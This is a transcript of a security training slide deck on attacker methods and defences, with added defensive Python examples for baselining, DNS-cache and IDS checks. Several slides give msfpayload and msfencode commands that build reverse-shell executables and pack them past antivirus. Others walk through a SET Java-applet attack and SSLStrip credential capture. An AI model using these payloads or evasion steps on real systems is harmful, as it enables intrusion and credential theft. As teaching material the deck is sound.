If I wake up evil... John Strand SANS Black Hills Information Security

Apr 01, 2015

Transcript
Page 1: If I wake up evil... John Strand SANS Black Hills Information Security.

If I wake up evil...
John Strand
SANS, Black Hills Information Security

Page 2: State of the Hack (Why We are Losing)

• The attackers have a clear advantage on us
  o They don't play by any rules
  o We do...
  o They have a well-defined structure for learning
  o Little to no attribution
• Many think that compliance equals security
  o This is not true
  o Compliance with regulations is a guideline
  o Regulations are a series of objectives, not a security program
• Many times we don't have time to "know" our networks and systems

Page 3: Malware Example: Conficker

• Devastating worm that infected over 15 million computers
• Infection through MS08-067, file shares and removable media
  o Microsoft disabled Autorun in response to this worm
• Highly effective defenses
  o Tries to kill AV every second
  o Blocks certain DNS lookups (AV vendor and update sites)
  o Disables Auto Update
  o Disables Safe Mode
• Updates itself
• Uses crypto (updates are signed, so only the authors can push new code to the botnet)

Page 4: State Of The Hack: Sony

• 100 million accounts compromised
• Shut down their network for 23 days
• $171 million in lost revenue and costs
• By the way, there were multiple Sony hacks this quarter
• Cross analysis between 1 million Sony passwords and 250K Gawker passwords revealed that many people reuse passwords
  – http://www.theregister.co.uk/2011/06/08/password_re_use_survey/
• Also, many people use password complexity exactly like we have trained them
  – And it still does not work

Page 5: State Of The Hack: Bank Of America

• "Hundreds" of accounts compromised
  – But in this case size does not matter
• The accounts targeted were "high value" targets
• The attack was launched by an insider
• Overly elaborate attack
  – Ordered new checks, forwarded phone calls and arranged for the check pickup
  – The attackers were unaware of automatic bill-pay...?
• 10 million dollars stolen
• How do we defend against an insider?

Page 6: State of the Hack: RSA

• About the RSA attack...
  – It might be worse than we thought, and we thought it was bad
• Attacks against LMCO, L-3 and possibly Northrop Grumman
• SecurID tokens generate a "random" code every 60 seconds
• This code is derived from a secret seed that is shared by the server and the token
• If you obtain the seed file from the server (.ASC or .XML) you can clone the codes the fob produces
• What if RSA was storing those seeds for its customers?
• What if those seeds were compromised?
• Unfortunately, we don't know a whole lot

Page 7: Wait, what?

Hi John,

Company X is asked every day if Product X could have stopped the latest du jour threat that is bypassing traditional blacklisting-based antivirus.

On June 26th, 2010, we showed how Product X beat down Stuxnet. On August 26th, Product X beat down DLL Hijacking attempts. The threats keep coming, so which ones should we beat down next?

Page 8: How did it Infect?

• USB... Yep, plain old USB
• The easiest way to bypass the firewall, IDS and IPS
• There were a number of 0-days
  – .lnk file vulnerability (CVE-2010-2568)
  – Print Spooler (CVE-2010-2729)
  – Win32k keyboard layout vulnerability (CVE-2010-2743)
  – Privilege escalation via Task Scheduler (CVE-2010-3338)
• There has been some misinformation about the Task Scheduler vulnerability from some AV vendors
  – You do not need to be in the local Administrators group
• It also used some older exploits like MS08-067
  – Conficker anyone?

Page 9: On to the Details

• Remember the Windows baseline section of 464?
  – tasklist /m
  – tasklist /m s7otbxdx.dll
• Stuxnet used DLL replacement to insert execution redirection
• In fact, it renamed s7otbxdx.dll to s7otbxsx.dll and inserted its own s7otbxdx.dll
  – This is important because it means the attackers had an understanding of the original code
  – 93 of the original 109 exports are forwarded to the renamed s7otbxsx.dll
  – The remaining 16 get us excited: those are the ones that read and write code blocks on the PLC
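The baseline-and-compare the slide points at, worked through as an added example. This is the editor's code, not from the deck or from any Stuxnet analysis tooling. It parses two constructed `tasklist /m` snapshots, one taken before and one after a Stuxnet-style rename-and-forward swap, and reports new modules and look-alike module names. Using `s7tgtopx.exe` as the process that loads `s7otbxdx.dll` is an assumption made for the sample.

```python
import re

# Constructed sample of `tasklist /m` output taken as the "known good" baseline.
# s7tgtopx.exe is assumed here to be the Step 7 process that loads s7otbxdx.dll.
BASELINE = """\
Image Name                     PID Modules
========================= ======== ============================================
System Idle Process              0 N/A
explorer.exe                  1480 ntdll.dll, kernel32.dll, shell32.dll
s7tgtopx.exe                  1234 ntdll.dll, kernel32.dll, s7otbxdx.dll
"""

# Constructed sample of the same command after a Stuxnet-style swap: the trojan
# s7otbxdx.dll forwards most calls to the renamed original, so the renamed copy
# now shows up as an extra module in the same process.
AFTER = """\
Image Name                     PID Modules
========================= ======== ============================================
System Idle Process              0 N/A
explorer.exe                  1480 ntdll.dll, kernel32.dll, shell32.dll
s7tgtopx.exe                  1240 ntdll.dll, kernel32.dll, s7otbxdx.dll,
                                   s7otbxsx.dll
"""

ROW = re.compile(r"^(\S.*?)\s+(\d+)\s+(.*)$")


def parse_tasklist_m(text):
    """Return {image name: set of module names}. PIDs are deliberately dropped so a
    reboot does not look like a change; indented continuation lines are folded
    into the preceding process."""
    procs, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Image Name") or line.startswith("="):
            continue
        if not line[0].isspace():
            m = ROW.match(line)
            if not m:
                continue
            current = m.group(1).lower()
            procs.setdefault(current, set())
            mods = m.group(3)
        elif current is None:
            continue
        else:
            mods = line
        for mod in mods.split(","):
            mod = mod.strip().lower()
            if mod and mod != "n/a":
                procs[current].add(mod)
    return procs


def lookalike_pairs(mods):
    """Module names of equal length differing in exactly one character: the
    trace a rename-and-forward swap leaves behind (s7otbxdx.dll / s7otbxsx.dll)."""
    names = sorted(mods)
    return [(a, b) for i, a in enumerate(names) for b in names[i + 1:]
            if len(a) == len(b) and sum(x != y for x, y in zip(a, b)) == 1]


def compare(baseline, current):
    """Diff a fresh snapshot against the baseline; returns (image, reason, detail)."""
    findings = []
    for image, mods in current.items():
        if image not in baseline:
            findings.append((image, "new process", sorted(mods)))
            continue
        added = mods - baseline[image]
        if added:
            findings.append((image, "new modules", sorted(added)))
        pairs = lookalike_pairs(mods)
        if pairs:
            findings.append((image, "look-alike modules", pairs))
    return findings


if __name__ == "__main__":
    for image, reason, detail in compare(parse_tasklist_m(BASELINE), parse_tasklist_m(AFTER)):
        print(f"{image}: {reason}: {detail}")
```

Feed it real snapshots by saving `tasklist /m` output on a clean day and again on the day you are worried about; the look-alike check is cheap and catches exactly the one-character rename the slide describes.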

Page 10: How did it Communicate?

• Once it infects a system it tries to connect to two sites to verify connectivity:
  – www.mypremierfutbol.com
  – www.todaysfutbol.com
  – Clearly not targeting a US audience...
• C2 servers in Malaysia and Denmark
  – Checking versions
• It also uses peer-to-peer communication
• Remember what we covered in the network lab?
  – Yeah, it tried to spread via shares
  – Watch that system-to-system communication
• Watch for PLC systems connecting to the Internet

Page 11: Clouds.... Evil Clouds.

Page 12: What is Cloud Computing?

• I had to look it up
  – I hear about it a lot, but I don't have a clear concept of what it is
• Straight to the Wiki!
  – "Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility."
• I get it... It is like a botnet!
• Based on vendor information it looks like it is going to make me irrelevant

Page 13: But What is it?

• "It is a paradigm shift..." Oh oh... This is going to be good.
• "It is a paradigm shift following the mainframe and client-server shifts that preceded it. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure 'in the cloud' that supports them.[1] Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet.[2][3] It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.[4]"
• "The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network [5], and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents.[6] Typical cloud computing providers deliver common business applications online which are accessed from a web browser, while the software and data are stored on servers."

Page 14: I Am Letting Wikipedia Write All of My Presentations!

• Security could improve due to centralization of data[35], increased security-focused resources, etc., but concerns can persist about loss of control over certain sensitive data, and the lack of security for stored kernels[36]. Security is often as good as or better than under traditional systems, in part because providers are able to devote resources to solving security issues that many customers cannot afford.[37] Providers typically log accesses, but accessing the audit logs themselves can be difficult or impossible. Furthermore, the complexity of security is greatly increased when data is distributed over a wider area and / or number of devices.

Page 15: Looking Forward To Unemployment?

Page 16: But Wait!!! Did they say "Internet"?

• "The term cloud is used as a metaphor for the Internet."
• But the Internet is evil!!
  – How can this be so?

Page 17: Let's set the stage...

• We have to know who it is we are working with
• Who are the people we are defending?
• Who is attacking?
  – What are their capabilities?
  – What are their means?
• What are the tools we have to defend ourselves?
• Who is on our side?

Page 18: Your Users

• They are trying to go places they shouldn't
• Security is not a major concern
  – They never get into trouble
  – "It was just a pop-up!"
  – They "think" they know what it would look like if they were attacked
• No skull and crossbones? Good to go!
• You "think" they are "stupid"
• Are they?

Page 19: Granny Max

• Loves to gamble
• Likes polka dots
• Likes anything with "Polka" in it
• Thinks the CD tray is a coaster
• Collects gnomes
• Bypasses your outbound web filters by using a third-party anonymizing proxy

Page 20: Phil... From Accounting

• Works with numbers...
• ... and terabytes of porn!
• Has a "slight" problem
• Does not get along with Granny Max
• Hates cats
• Bypasses your filtering by using an SSH tunnel through his home system

Page 21: The "Average" Users

• Do not gamble...
  – ... at work
• Do not surf porn...
  – ... at work
• Likes: Facebook, YouTube, politics, eBay, Googling, fantasy football, Fark, Drudge Report, the Huffington Post, CNN, Amazon
• Dislikes: web filters
• Quickly becoming friends with Phil and Granny Max to learn ways to bypass your filtering

Page 22: The Bad Guys

• Motivated
  – Can you imagine their HR department?
• Wicked skilled (more on this later)
• They either own or infect many of the sites your more "interesting" users are going to

The Bobs

Page 23: The Cloud

• The Internet is big...
• ... really big
• You just won't believe how vastly, hugely, mind-bogglingly big it is...
• Most of it is worthless... and evil!
• Many of your users will not stop clicking until they visit every site

Page 24: Let's Compromise An Account

Page 25: Bypassing AV

• "But Anti-Virus software will protect us... Right?"
• Anti-Virus, like all software, has its limitations
• Do not believe for one second that it is the ultimate protection
• It works great for detecting and removing known malware
  – That means someone was infected before you
• Many dedicated and targeted attackers are not concerned about anti-virus software
• But why?

Page 26: How Would an Attacker Bypass AV?

• There are a variety of ways
• But remember the goal is to create a "new" signature: a file whose bytes no longer match anything the AV vendor has already seen
• Attackers can use packers to "pack" the malicious code
  o This creates a self-extracting and executing file
  o In the process of packing the executable is scrambled
  o Functions may not be where AV expects them to be
• Attackers can also use tools to "encode" the executable
  o This has been around for a long time in tools like ADMutate and PEScrambler
  o One technique these tools use is to add a large number of "jumps" to the code, making it difficult to reverse

Page 27: No Tricks

• Let's say an attacker wanted to create an executable that delivers a reverse-connecting, memory-resident payload (Meterpreter never has to touch disk once the stager runs)
• Straight msfpayload to an exe:

```sh
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8081 X > PlainMetrev_8081.exe
```

• X emits a Windows executable; R (used later) emits raw shellcode for piping into msfencode. Both tools were retired from Metasploit in 2015 in favour of msfvenom, which does the same two jobs in one command.

Page 28: Not Too Bad..

Page 29: But Wait!!!

Page 30: Thank You Panda...

Page 31: Add a Bit of UPX..

• Attackers can use compression as a means to bypass AV products
• One product that attackers often use is the Ultimate Packer for eXecutables (UPX)

```sh
upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exe
```

  o This creates an executable that is compressed with a setting of 2
  o The settings go from 1 to 9
  o The higher the level, the greater the compression
  o 2 works very well for bypassing AV
  o UPX is so common that it is also a tell: the UPX0/UPX1 section names are obvious, and `upx -d` hands a scanner the original back, so on its own it only beats engines that do not unpack before matching

Page 32: Cut in Half?

Page 33: What if We Used the Browser for Communication?

```sh
./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=9091 X > PlainShellRevHttp_8081.exe
```

• This is slightly different than the previous example
• This is a shell that makes a reverse HTTP connection, so the callback looks like ordinary web traffic to anything watching the wire

Page 34: Down to Only 17.95%

Page 35: What if We Try a Reverse http Shell with Encoding?

```sh
./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' -t exe -o EncShellRevHttp.exe
```

• We are now using encoding on the executable (R emits raw shellcode for the pipe; `-b ''` declares no bad characters to avoid; `-t exe` wraps the result in an executable)
• This means the executable will be different every time it is created
• The default encoder with the Metasploit framework is "Shikata ga nai"
• This means "There is nothing that can be done about it" in Japanese
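To show why the three builds above score differently, here is an added example in Python (the editor's code, not from the deck and not Metasploit's): a toy byte-signature check and an entropy check run over a constructed payload, before and after a stand-in for an encoder. The LCG keystream is a substitute for shikata_ga_nai, chosen only because it produces a different body per seed; the signature string and payload bytes are made up and the blob is not a real PE.

```python
import math

# Constructed stand-in for the generated executable: zero padding, a NOP sled and
# the strings an AV signature would key on. Not a real PE, just bytes.
SIGNATURE = b"windows/shell/reverse_http"
PLAIN = (b"MZ" + b"\x00" * 2000 + b"\x90" * 500 + SIGNATURE
         + b" LHOST=192.168.1.1 LPORT=8080" + b"\x00" * 500)


def signature_hit(blob, signature=SIGNATURE):
    """The blacklist check: does the known byte pattern occur verbatim?"""
    return signature in blob


def keystream(seed, length):
    """Toy keystream from a 32-bit LCG. A stand-in for an encoder such as
    shikata_ga_nai, NOT Metasploit's code: the point is only that every seed
    yields a different byte stream, so every build looks different on disk."""
    state, out = seed & 0xFFFFFFFF, bytearray()
    for _ in range(length):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def encode(data, seed):
    """XOR the payload with the keystream. A real encoder prepends a decoder stub
    that undoes this at run time, which is why the code still executes."""
    return bytes(b ^ k for b, k in zip(data, keystream(seed, len(data))))


decode = encode  # XOR with the same keystream is its own inverse


def shannon_entropy(data):
    """Bits per byte. Plain code and padding sit well below 8; packed or encoded
    bodies approach it, which is what an entropy heuristic keys on."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan(blob, entropy_threshold=7.0):
    """Verdict a scanner combining both checks would produce."""
    entropy = shannon_entropy(blob)
    return {"signature": signature_hit(blob),
            "entropy": round(entropy, 2),
            "packed_or_encoded": entropy > entropy_threshold}


if __name__ == "__main__":
    print("plain  :", scan(PLAIN))
    print("encoded:", scan(encode(PLAIN, seed=1)))
    print("rebuilt:", scan(encode(PLAIN, seed=2)))
```

The signature check is exact and dies the moment the bytes change, which is the whole point of the deck's "race to 0". The entropy check is the opposite trade: it notices that something is packed or encoded without knowing what, and it fires on legitimately compressed installers too, so on its own it is a lead, not a verdict.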

Page 36: Race to 0

Page 37: Bypassing IDS

• There are a variety of ways to bypass AV
• But what about IDS?
• Turns out many IDS products have the same "signature-based" problem
• Some claim to be "heuristic"
• We can fragment our attacks
  o Separate the attack across multiple packets
• We can encode the attacks
  o Into Base64
  o Unicode
  o Hex
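Added example (editor's code, not from the deck): a per-packet, byte-for-byte matcher beside a stream-reassembling, normalizing inspector, both run over constructed requests that use the fragmentation and encoding tricks listed above (percent encoding, double percent encoding, IIS-style %uXXXX, mixed case). The patterns and requests are made up for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed detection patterns, kept lowercase.
PATTERNS = ("../", "union select", "/bin/sh")

IIS_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")


def naive_match(packet):
    """Per-packet, literal matching: what a basic signature does."""
    return [p for p in PATTERNS if p in packet.lower()]


def normalize(data, max_rounds=3):
    """Undo the encodings an attacker layers on: IIS-style %uXXXX, URL percent
    encoding (repeated, to catch double encoding), case and backslash separators.
    Bounded so a hostile input cannot keep the decoder looping."""
    s = data
    for _ in range(max_rounds):
        before = s
        s = IIS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = unquote(s)
        if s == before:
            break
    return s.lower().replace("\\", "/")


def inspect_stream(packets):
    """Reassemble the TCP stream first, then normalize, then match."""
    return [p for p in PATTERNS if p in normalize("".join(packets))]


# Constructed requests, each already split into the packets the attacker sends.
CASES = {
    "plain":        ["GET /cgi-bin/../etc/passwd HTTP/1.0\r\n"],
    "fragmented":   ["GET /cgi-bin/.", "./etc/passwd HTTP/1.0\r\n"],
    "percent":      ["GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.0\r\n"],
    "double":       ["GET /%252e%252e%252fetc/passwd HTTP/1.0\r\n"],
    "iis_unicode":  ["GET /%u002e%u002e%u002fetc/passwd HTTP/1.0\r\n"],
    "sql_case_mix": ["GET /item?id=1%20uNiOn%20sElEcT%20user,pass HTTP/1.0\r\n"],
}


def evaluate(cases=CASES):
    """For each case: what per-packet naive matching sees versus a stream-aware,
    normalizing inspector."""
    return {name: (sorted({p for pkt in pkts for p in naive_match(pkt)}),
                   inspect_stream(pkts))
            for name, pkts in cases.items()}


if __name__ == "__main__":
    for name, (naive, stream) in evaluate().items():
        print(f"{name:12s} naive={naive} stream={stream}")
```

Only the plain request trips the naive matcher; every other case is invisible until the sensor both reassembles the stream and decodes before it compares, which is the work the "heuristic" label on a product box may or may not stand for.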

Page 38: Bypassing IDS: Uncreative, Yet Effective Ways

• Why not have the victim system connect to us!
  – We bypass many firewall and IDS/IPS restrictions
  – We can make it look like standard web traffic
• We could have our attacks go over Secure Sockets Layer
  – Many organizations are using SSL to protect their traffic in transit
  – However, it often blinds them to attacks against their web servers
  – Attackers can try Cross Site Scripting, SQL Injection and Command Injection all day long
  – Remember, just because there is a lock it does not mean it is "secure"

Page 39: Blending with Normal Processes

• One of the easiest ways for an attacker to hide, or even attack your systems, is to "blend in"
• Many people think that an attacker will only use exploits to "spread" through your network
  o This is not true
• Rather, they will utilize built-in services and commands to compromise additional systems
  o SSH or RDP with accounts and passwords from the first system compromised
• This will not be caught by your IDS because it is "normal" traffic

Page 40: Exploit Demo

Page 41: Java as a Payload

• Java is an excellent payload option
  – Installed pretty much everywhere
  – Users are accustomed to clicking "Run" for Java apps
• SET has the ability to take a Metasploit payload and export it to a .jar file
• In this example we will be taking the default SET web page and inserting a .jar file into it
• When a user connects to our site the Java app will load
• Shell will ensue

It's what's for breakfast.

Page 42: Starting SET

Nice ASCII art!

Page 43: SETting Options

Hack by numbers! Please select option number 2.

Page 44: SET Website Attack Vectors

Screenshot callouts:
• The option we will be using: very effective if you know HTML
• "Import your own website" is even more effective if you are not particularly good at HTML

Page 45: Choosing Java as Our Payload

Can be flaky

Page 46: Setting the Payload Type

• Meterpreter and VNC payloads are nice
  – However, they can be unstable
• Shell Reverse_TCP tends to be the most stable in testing
• Knowing if your target is running 64-bit can be a big help

Please select option 1 for 32-bit, or 6 for Windows 64-bit systems

Page 47: Setting the Encoder

We are going to use shikata_ga_nai, and we will encode twice

Page 48: Linux and OS X Payloads

Please choose "no"

Metasploit starting

Page 49: Payload in Waiting

Reverse payload listening on 4444

Because cows are cool

Page 50: Browsing to Your Site

Everyone clicks "Run"

http://[Your Linux IP]

Page 51: Got Shell?

• Yes!!!
• Now you can wield your Windows command-line kung fu!

Interacting with our shell: time to do the "Happy Dance"

Page 52: There are other ways...

Page 53: ISR Evilgrade

• Modular exploit tool to spoof software update responses
  – "Yes, there IS an update available!"
• Delivers an executable of your choosing to the victim
• Includes support for multiple vulnerable updaters
  – JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more
  – The updaters it can hit are the ones that fetch over plain HTTP and run what they download without verifying a signature
• Relies on MITM from a third-party attack
  – LAN and Ettercap, or remote with DNS manipulation
• Perl-based console interface similar to Cisco IOS
  – Output and navigation slightly messy

Page 54: USB Threat Update

• Let's say you disabled Autorun on all your systems
• Further, let's say you disabled USB mass storage devices
• You can still be compromised by a tin of Altoids
• Enter the Programmable HID USB Keystroke Dongle
  – The latest attack vector from Irongeek
  – It enumerates as a keyboard and types its payload, so neither the Autorun nor the mass-storage control applies
  – He is now trying to find fixes
• Implemented in SET
• Upload any Metasploit payload

Page 55: Wireless Device Control: "My SSID is P0wned"

• "But we do not have wireless in our network!"
  – Are you sure?
• One access point can bypass all of your external controls
• "Free Wireless Internet" anyone?
• Attackers do not need to find an access point
  – They just need to find a client
  – Karmetasploit is evil: it answers every probe request, so a laptop looking for its home SSID happily joins the attacker's AP
• This also goes for your phone
  – Do you use GSM?
  – http://www.shmoocon.org/presentations-all.html#srsly

Page 56: Maltego

• By Paterva
• Focus is on "extreme" reconnaissance
• GUI-based display
  – I know... I know... But the GUI rocks
• We can pull
  – Personal information
  – Sites
  – Additional email addresses
  – Friends?
  – Family?
  – Interests

Page 57: Who is John Strand?

Step 1: Click Email Address
Step 2: Click Here
Step 3: Fill in the email

Page 58: Starting the Transformations

Right click and select All Transforms

Page 59: It can be a lot of data

Click Yes

Page 60: What did we find

LinkedIn

A friend

Page 61: What about SSL?

• There are a number of different ways to hijack SSL
  – See webmitm from dsniff
• Unfortunately the user will receive "negative feedback"
  – Just another way of saying they get a pop-up box (the certificate warning)
• Most users will click through
  – The paranoid ones will not
• So how do you hijack the overly paranoid user?

Page 62: We can use SSLStrip

• Another great tool from Moxie Marlinspike
• This tool strips away SSL from the end user
  – Hence the name
• The HTTPS will become HTTP
  – No negative feedback to the user: the browser never opens a TLS session, so there is no certificate for it to complain about
• The vast majority of users will not notice
  – Even the very paranoid ones
  – The 300
• We need to use a tool like dsniff (arpspoof) to hijack the traffic and a tool like iptables to redirect the traffic to where sslstrip is waiting
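What sslstrip does to a response, and the one browser-side control that defeats it, as an added example (editor's code, not sslstrip's): a minimal rewriting proxy run over a constructed response, plus an HSTS cache check. HSTS (RFC 6797) postdates this deck; the hostnames and the response are placeholders.

```python
import re

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class StripProxy:
    """The bookkeeping an sslstrip-style proxy needs: which plaintext URLs it handed
    the victim that were really HTTPS, so it can re-upgrade them upstream."""

    def __init__(self):
        self.stripped = {}  # "http://host/path" -> "https://host/path"

    def _downgrade(self, url):
        plain = "http://" + url[len("https://"):]
        self.stripped[plain] = url
        return plain

    def rewrite_response(self, headers, body):
        """Rewrite the server's response before it reaches the victim: HTTPS links in
        the body and in Location become HTTP, so the browser never opens a TLS
        session and never sees a certificate warning. The proxy also drops the
        Strict-Transport-Security header, the only thing in the response that
        would have stopped it next time."""
        headers = dict(headers)
        loc = headers.get("Location")
        if loc and loc.startswith("https://"):
            headers["Location"] = self._downgrade(loc)
        headers.pop("Strict-Transport-Security", None)
        body = HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), body)
        return headers, body

    def upstream_url(self, client_url):
        """When the victim asks for the plaintext URL, the proxy fetches the real one."""
        return self.stripped.get(client_url, client_url)


# The defence: once a browser has seen Strict-Transport-Security from a host over a
# valid TLS connection, it refuses to send the plaintext request the strip depends
# on until max-age expires. A preloaded host never sends it at all.
MAX_AGE = re.compile(r"max-age=(\d+)")


def remember_hsts(cache, host, header_value, now):
    """Update the browser's HSTS cache from a header seen over a good TLS session."""
    m = MAX_AGE.search(header_value or "")
    if m:
        cache[host] = now + int(m.group(1))
    return cache


def browser_sends_plaintext(cache, host, now):
    """True if the browser would issue http:// to this host, i.e. the strip can work."""
    return cache.get(host, 0) <= now
```

The rewrite is trivial; what makes the attack work is that the user clicked a plain-HTTP link or typed a bare hostname first, which is exactly the request HSTS removes.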

Page 63: SSLStrip

Get your target's IP and gateway

Page 64: SSLStrip

Page 65: SSLStrip: iptables

Page 66: SSLStrip: arpspoof

Page 67: SSLStrip: Got one!

• Now surf to http://gmail.com and try to log in!
• You should see some activity in SSLStrip!!

Page 68: SSLStrip: Checking the logs

Looks like we got some data!!!

Page 69: SSLStrip: Looking at the log

Page 70: SSLStrip: /hackme

Paydirt!!!

Page 71: Starting over..

Page 72: Back to Basics...

• Baseline your systems
  – Processes, DLLs for core applications, users, etc.
• Baseline your network traffic
  – Why would you allow PLC systems to connect to the Internet?
• Monitor those baselines
  – If at all possible, do this hourly
• Don't use shady Russian contractors with compromised websites
• Train everyone, because everyone is a target
  – Secure the human
• Yes, even you
  – Sounds paranoid, I know
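The network baseline from this slide and from the Stuxnet communication slide (PLC systems reaching the Internet; system-to-system traffic you did not expect) as an added example over a constructed connection log. This is the editor's code, not from the deck; the 10.20.1.0/24 control subnet, the baseline peer list and every log row are made up.

```python
import ipaddress

# Constructed connection log: timestamp, source, destination, destination port, protocol.
# Loosely modelled on a Zeek conn.log, but constructed for this example.
CONN_LOG = """\
2011-06-01T10:00:01 10.20.1.15 10.20.1.2 502 tcp
2011-06-01T10:00:03 10.20.1.15 10.20.1.250 102 tcp
2011-06-01T10:00:07 10.20.1.17 93.184.216.34 80 tcp
2011-06-01T10:00:09 10.20.1.17 8.8.8.8 53 udp
2011-06-01T10:00:12 10.50.4.21 93.184.216.34 443 tcp
2011-06-01T10:00:15 10.20.1.15 10.20.1.17 445 tcp
"""

# Assumed control-system subnet.
PLC_NETS = [ipaddress.ip_network("10.20.1.0/24")]

# What the control subnet talked to during the baseline period (assumed): the HMI
# on Modbus/502 and the engineering station on ISO-TSAP/102.
BASELINE_PEERS = {
    ("10.20.1.15", "10.20.1.2", 502),
    ("10.20.1.15", "10.20.1.250", 102),
}


def parse(log):
    rows = []
    for line in log.splitlines():
        ts, src, dst, port, proto = line.split()
        rows.append((ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(port), proto))
    return rows


def in_plc_net(ip):
    return any(ip in net for net in PLC_NETS)


def audit(log):
    """Two checks from the slides: (1) a control-network host talking to a public
    address at all, (2) any control-network flow that was not in the baseline,
    which is how share-based lateral movement (445) shows up."""
    findings = []
    for ts, src, dst, port, proto in parse(log):
        if not in_plc_net(src):
            continue
        if not dst.is_private:
            findings.append((ts, str(src), str(dst), port, "PLC network host reaching the Internet"))
        elif (str(src), str(dst), port) not in BASELINE_PEERS:
            findings.append((ts, str(src), str(dst), port, "flow not in baseline"))
    return findings


if __name__ == "__main__":
    for finding in audit(CONN_LOG):
        print(*finding)
```

The baseline set is the expensive part: it has to come from a period you trust, and it has to be re-learned when the plant changes, which is why the slide says "hourly" for the monitoring but not for the baselining.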

Page 73: Risk and the 20 Critical Controls

Page 74: Autostart Entry Points

• There are a number of autostart entry points on your Windows systems
  – Run
  – RunOnce
  – RunOnceEx
• There are a lot more of these than we can cover in a few slides
  – Userinit
  – Boot.ini
• There needs to be a better way to look at what is going to automatically start on our Windows computers

Page 75: Sysinternals Autoruns

Page 76: Find Evil

Page 77: Red Curtain

Page 78: Malware Detection on Linux

• Rather than look for specific malware we can also look for indications of compromise
• Rootkit Hunter (rkhunter) and chkrootkit do this
• They also look for a few specific binaries
• Very easy to set up and use
• Looks for
  – Certain hashes
  – Wrong file permissions
  – Hidden files
  – Orphaned files
• Why use both tools?
  – Their checks only partly overlap, and a rootkit that evades one often does not evade the other

Page 79: Malwarednsscrap.pl

• Sometimes the best way to know you are compromised is to check your DNS cache
• Not 100%, but nothing is
• This script queries your DNS server and sees if there are any cached entries for "bad" sites
• It can automatically pull down a blacklist and do a compare
• However, you can provide your own blacklist
• Best used daily (think Nagios)
• http://www.mayhemiclabs.com/tools/malwarednsscraper
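A Python version of the same cache check, added here as an example. It is not the malwarednsscraper script itself (which is Perl and queries the DNS server); it reads a constructed `ipconfig /displaydns` excerpt and a constructed blocklist feed, matches by domain suffix so that subdomains of a blocklisted name hit, and also checks CNAME targets. Domain names and addresses are placeholders.

```python
import re

# Constructed excerpt of `ipconfig /displaydns` output from a workstation.
DNS_CACHE = """\
    www.microsoft.com
    ----------------------------------------
    Record Name . . . . . : www.microsoft.com
    Record Type . . . . . : 5
    CNAME Record  . . . . : www.microsoft.com.edgekey.net

    update.c2.evil.test
    ----------------------------------------
    Record Name . . . . . : update.c2.evil.test
    Record Type . . . . . : 1
    A (Host) Record . . . : 198.51.100.77

    cdn.example.com
    ----------------------------------------
    Record Name . . . . . : cdn.example.com
    Record Type . . . . . : 5
    CNAME Record  . . . . : edge.badsite.example.

    www.evil.test.example.org
    ----------------------------------------
    Record Name . . . . . : www.evil.test.example.org
    Record Type . . . . . : 1
    A (Host) Record . . . : 192.0.2.10
"""

# Constructed blocklist feed: one domain per line, comments allowed, mixed case.
BLOCKLIST_FEED = """\
# constructed sample feed
c2.evil.test
BADSITE.example
"""

NAME_LINE = re.compile(r"^\s*(?:Record Name|CNAME Record)[ .]*:\s*(\S+)", re.M)


def normalize(name):
    """Lowercase and drop the trailing dot a cache dump may include."""
    return name.lower().rstrip(".")


def load_blocklist(feed):
    return {normalize(l) for l in feed.splitlines()
            if l.strip() and not l.lstrip().startswith("#")}


def cached_names(dump):
    """Every name in the cache, including CNAME targets: a benign-looking host that
    resolves through a blocklisted one is still a hit."""
    return {normalize(n) for n in NAME_LINE.findall(dump)}


def is_blocked(name, blocklist):
    """Exact or parent-domain match: www.badsite.example hits on badsite.example,
    but www.evil.test.example.org does not hit on evil.test (suffix, not substring)."""
    labels = name.split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def scan_cache(dump, feed):
    blocklist = load_blocklist(feed)
    return sorted(n for n in cached_names(dump) if is_blocked(n, blocklist))


if __name__ == "__main__":
    for hit in scan_cache(DNS_CACHE, BLOCKLIST_FEED):
        print("blocklisted name in DNS cache:", hit)
```

Suffix matching is the detail that matters: a substring match would flag `www.evil.test.example.org` on `evil.test`, and a plain exact match would miss `update.c2.evil.test`. The same logic applies unchanged to a cache dump from the resolver instead of the workstation.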

Page 80: Running Malwarescraper.pl

Screenshot callouts: Good / Bad

Page 81: Offensive Countermeasures: Is this allowed?

Page 82: The Split

• When discussing security we need to be of two separate minds
  – Offensive
  – Defensive
• A little lesson on OODA loops
  – Observe
  – Orient
  – Decide
  – Act
• In our current defensive postures, how can we do this?

Page 83: Dynamic Blacklisting: Windows

• Anything that connects to the honeyport (3333 here) gets a Windows Firewall block rule for its source address:

```bat
@echo off
rem Honeyport: nothing legitimate listens on 3333, so any connection to it is hostile.
rem netstat -nao columns: Proto, Local Address, Foreign Address, State, PID, so token 3 is the foreign address.
rem The innermost loop splits that "ip:port" on ":" and blocks the ip with netsh.
rem for /L with (1,1,1) runs the body once; widen the range to poll repeatedly.
for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
```

